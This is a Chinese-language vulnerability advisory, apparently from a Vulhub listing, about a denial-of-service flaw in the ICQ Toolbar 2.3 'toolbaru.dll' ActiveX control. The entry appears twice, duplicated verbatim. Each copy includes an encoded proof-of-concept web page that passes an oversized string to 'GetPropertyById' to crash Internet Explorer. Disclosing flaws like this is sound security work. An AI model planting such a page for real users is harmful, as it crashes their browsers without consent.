VULHUB ™

BUGTRAQ ID: 28118 CNCAN ID:CNCAN-2008030705 ICQ是一款流行的即时信息通讯程序。 ICQ工具栏'toolbaru.dll' ActiveX控件存在输入检查问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 问题是'toolbaru.dll' ActiveX控件对'GetPropertyById'方法缺少正确处理，构建恶意WEB页，诱使用户访问，可导致对应用程序进行拒绝服务攻击。 测试方法 &amp;lt;!-- Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p --&amp;gt; &amp;lt;html&amp;gt; &amp;lt;object classid=&amp;#039;clsid:855F3B16-6D32-4FE6-8A56-BBB695989046&amp;#039; id=&amp;#039;toolbar&amp;#039; &amp;gt;&amp;lt;/object&amp;gt; &amp;lt;script language=&amp;#039;vbscript&amp;#039;&amp;gt; bof=String(128, &amp;quot;spdr&amp;quot;) toolbar.GetPropertyById &amp;quot;&amp;quot; ,bof &amp;lt;/script&amp;gt; &amp;lt;/html&amp;gt; ICQ Inc. ICQ Toolbar 2.3 beta ICQ Inc. ICQ Toolbar 2.3 目前没有解决方案提供： <a href=http://www.icq.com/download/toolbar/ target=_blank>http://www.icq.com/download/toolbar/</a>

BUGTRAQ ID: 28118 CNCAN ID:CNCAN-2008030705 ICQ是一款流行的即时信息通讯程序。 ICQ工具栏'toolbaru.dll' ActiveX控件存在输入检查问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 问题是'toolbaru.dll' ActiveX控件对'GetPropertyById'方法缺少正确处理，构建恶意WEB页，诱使用户访问，可导致对应用程序进行拒绝服务攻击。 测试方法 &amp;lt;!-- Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p --&amp;gt; &amp;lt;html&amp;gt; &amp;lt;object classid=&amp;#039;clsid:855F3B16-6D32-4FE6-8A56-BBB695989046&amp;#039; id=&amp;#039;toolbar&amp;#039; &amp;gt;&amp;lt;/object&amp;gt; &amp;lt;script language=&amp;#039;vbscript&amp;#039;&amp;gt; bof=String(128, &amp;quot;spdr&amp;quot;) toolbar.GetPropertyById &amp;quot;&amp;quot; ,bof &amp;lt;/script&amp;gt; &amp;lt;/html&amp;gt; ICQ Inc. ICQ Toolbar 2.3 beta ICQ Inc. ICQ Toolbar 2.3 目前没有解决方案提供： <a href=http://www.icq.com/download/toolbar/ target=_blank>http://www.icq.com/download/toolbar/</a>